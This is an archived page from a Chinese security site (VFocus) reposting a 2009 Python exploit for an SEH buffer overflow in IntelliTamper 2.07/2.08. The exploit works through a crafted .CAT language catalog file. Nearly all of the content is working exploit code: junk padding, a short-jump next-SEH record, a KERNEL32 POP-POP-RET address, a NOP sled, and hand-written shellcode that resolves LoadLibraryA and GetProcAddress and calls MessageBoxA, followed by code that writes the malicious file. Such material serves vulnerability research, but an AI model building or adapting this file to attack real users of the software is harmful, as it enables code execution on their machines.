首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 IntelliTamper (2.07/2.08) Language Catalog SEH Overflow Exploit 来源：www.vfcocus.net 作者：Cn4phux 发布时间：2009-01-09   #!usr/bin/python # IntelliTamper (2.07/2.08) Language Catalog SEH Overflow Exploit.     # we start off the exploitation with some fuzzing to determine how many bytes     # before overwriting the pointer to next SEH     # and pointer to SEH, we will try and overwrite each address with 41414141 "AAAA" [Pointer to next SEH]     # and 42424242 "BBBB" [pointer to SEH].    # 0x41414141  Pointer to next SEH record # 0x42424242  SE handler # # The vulnerability was discovered by 'Cnaph'. First click in "File" through your IntelliTamper and >> "Options" # Then open your crafted file .CAT to update your Language catalog and your SEH will be overwritten. # This exploit implements the SEH technique to exploit the issue . . . # When doing SEH overwrites the pointer to the SEH handler is target to be overwritten, # so we can gain control over the program. #/Cnaph. print "[+] IntelliTamper (2.07/2.08) Language Catalog SEH Overflow Exploit."; Variable = "\x24\x30\x30\x30\x38\x30\x3D"; Junks =("\x41"*761)+("\x91"*19702)+(106*"\x41") Nex_SEHHandler = "\xeb\x06\x90\x90"; # JMP SEH_handler = "\x61\xfb\x86\x7c"; # SE.42424242 le SEH handler est ecrasé.                          # L'addresse de déplacement de l'indicateur SEH va etre changé.                          # KERNEL32.DLL (CALL EBX POP POP RET) NOP_SLED = "\x90"*12 Shellcode =((("\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb"               "\x77\x1d\x80\x7c" #LoadlibaryA(libaryname)               "\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb"               "\x28\xac\x80\x7c" #GetProcAddress(hmodule,functionname)               "\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x06\x31\xd2\x52\x51"               "\x51\x52\xff\xd0\x31\xd2\x50\xb8\xa2\xca\x81\x7c\xff\xd0\xe8\xc4\xff"               "\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"               "\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"               "\xff\x63\x4E\x34\x70\x68\x75\x78"))); # Plus = "\n\n\n\n" Seh_overwrite = Variable + Junks + Nex_SEHHandler + SEH_handler + NOP_SLED + Shellcode genre = ".CAT"; Title = "IntelliTamper_DZ"; headers = open(Title + genre, "w") headers.write(Seh_overwrite) headers.close() print "[+] Exploit file has been successfully built."; print "\n\Cnaph.";   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Anope IRC Services With bs_fan ·Virgilio Toolbar Toolbar Activ ·XOOPS 2.3.2 (mydirname) Remote ·VMware COM DB ActiveX Remote B ·Pizzis CMS <= 1.5.1 (visualizz ·IE Denial of Service Exploit ( ·GOM Player 2.0.12.3375 (.ASX F ·以色列人发现的IE 0day ·CuteNews <= 1.4.6 (ip ban) XSS ·MP3 TrackMaker 1.5 (.mp3 File) ·VUPlayer 2.49 .ASX File (HREF) ·MS Internet Explorer JavaScrip   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved